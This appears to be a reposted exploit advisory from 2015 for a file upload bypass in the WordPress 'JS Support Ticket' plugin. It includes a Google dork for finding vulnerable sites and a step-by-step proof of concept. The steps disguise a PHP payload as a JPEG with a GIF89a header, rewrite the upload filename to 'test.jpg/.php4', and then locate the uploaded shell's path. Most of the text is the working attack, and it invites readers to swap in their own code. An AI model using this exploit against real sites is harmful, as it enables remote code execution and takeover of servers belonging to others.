#-Title: Wordpress "Js Support Ticket" File Upload Bypass Extensions
#-Author: Mgm-Eg
#-Contact : ask.fm/m1g1m
#-Contact : ask.fm/m1g1m
#-Date: 2015-12-05
#-Link Download : wordpress. org/plugins/js-support-ticket/
#-Google Dork: inurl:wp-content/plugins/js-support-ticket/
#-Tested on : Windows, Linux
#-Fixed in : ??
////////////////////////////////////////////////////////////////////////////////////////////
Description :
When you open ticket you can upload Attachments only file Extenssion Type :
Doc, Docx, odt, pdf, txt, png, jpeg, jpg
But you can bypass it and upload another extensions
Solution:
Upgrade to New version
-- Proof Of Concept --
1. Use Notepad++ open new file ,
Add
[ GIF89a;
<?php phpinfo(); ?> #you can replace this code to your code
]
2. " save file as test.jpg "
3. Open ticket page and Complete the required fields , and upload your [test.jpg]
Use Http Live Header , Open the request and edit file name from "test.jpg" to "test.jpg/.php4" and delete "GIF89a;"
example :
-----------------------------319722301512393rn
Content-Disposition: form-data; name="filename[]"; filename="test.jpg/.php4"rn
Content-Type: image/jpegrn
rn
rn
<?php phpinfo(); ?>rn
-----------------------------319722301512393rn
Shell Path :
*Note
also check your email to know your path file , or open my tickets to see all tickets you have sent to know your path file .
0 Response to "Wordpress "Js Support Ticket" File Upload Bypass Extensions"
Posting Komentar